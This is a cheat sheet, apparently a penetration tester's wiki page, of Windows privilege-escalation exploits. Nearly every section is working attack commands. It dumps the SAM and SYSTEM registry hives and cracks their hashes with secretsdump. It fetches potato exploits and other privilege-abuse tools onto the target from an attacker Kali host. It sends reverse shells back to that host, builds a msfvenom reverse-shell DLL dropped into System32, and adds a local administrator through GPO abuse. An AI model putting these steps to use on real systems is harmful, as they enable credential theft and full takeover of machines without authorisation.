Exploits

SeBackupPrivilege

1

Copy SAM and SYSTEM file

reg save hklm\sam C:\Users\<Username>\SAM

reg save hklm\system C:\Users\<Username>\SYSTEM
2

Bring the file to Kali

3

Crack them

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

SeImpersonatePrivilege

SigmaPotato.exe

wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
1

Download SigmaPotato.exe into target machine

iwr -Uri http://<Kali IP Address>/SigmaPotato.exe -OutFile SigmaPotato.exe
2

Execute command

./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>

EXAMPLE: Send reverse shell back

./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>

PrintSpoof.exe

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
1

Download PrintSpoofer.exe

iwr -Uri http://<Kali IP Address>/PrintSpoofer[64 / 32].exe -OutFile PrintSpoofer[64 / 32].exe
2

Execute Command

PrintSpoofer.exe -i -c <Command To Execute>

GodPotato.exe

NOTE: Know the version by the following

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe
1

Download GodPotato.exe

iwr -Uri http://<Kali IP Address>/GodPotato-[Version].exe -OutFile GodPotato.exe
2

Execute command

./GodPotato.exe -cmd "<Command to execute>"

SeRestorePrivilege

SeRestoreAbuse.exe

wget https://github.com/dxnboy/redteam/raw/refs/heads/master/SeRestoreAbuse.exe
1

Create a reverse shell

2

Download SeRestoreAbuse.exe and Shell File

iwr -Uri http://<Kali IP Address>/SeRestoreAbuse.exe -OutFile SeRestoreAbuse.exe

iwr -Uri http://<Kali IP Address>/<Shell  File Name> -OutFile <Shell File Name>
3

Execute command

.\SeRestoreAbuse.exe <Full Path to Shell File>

SeManageVolumePrivilege

wget https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
1

Download SeManageVolumeExploit.exe

iwr -Uri http://<Kali IP Address>/SeManageVolumeExploit.exe -OutFile SeManageVolumeExploit.exe
2

Execute command

.\SeManageVolumeExploit.exe
3

Create Revershell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<Kali IP Address> LPORT=<Kali Port> -f dll -o C:\Windows\System32\webm\tzres.dll
4

Trigger the DLL

systeminfo

GPO Abuse

wget https://github.com/byronkg/SharpGPOAbuse/raw/refs/heads/main/SharpGPOAbuse-master/SharpGPOAbuse.exe
1

Download SharpGPOAbuse.exe

iwr -Uri http://<Kali IP Address>/SharpGPOAbuse.exe -OutFile SharpGPOAbuse.exe
2

Run command

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount <Username> --GPOName "<GPO DisplayName>"
3

Force Group Policy to update

gpupdate /force

SearchSploit

1

Windows Enumeration

Identify OS name, version, architecture

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
wmic os get Caption, Version. OSArchitecture

NOTE: Get Windows Build Version from here.

2

Search exploit in SearchSploit

searchspoilt <Key Word>

EXAMPLE:

searchsploit "Windows Kernel Build <Build Number> Local Privilege Escalation"
3

Download exploit

searchsploit -m <EDB-ID>

Run as another user

GUI

runas /user:<Domain Name>\<Username> cmd.exe

CLI

wget https://raw.githubusercontent.com/antonioCoco/RunasCs/refs/heads/master/Invoke-RunasCs.ps1
1

Download Invoke-RunasCs.ps1

iwr -Uri http://<Kali IP Address>/Invoke-RunasCs.ps1 -Outfile Invoke-RunasCs.ps1
2

Run command

Invoke-RunasCs -Username <Username> -Password <Password> -Command "<Command>"

Last updated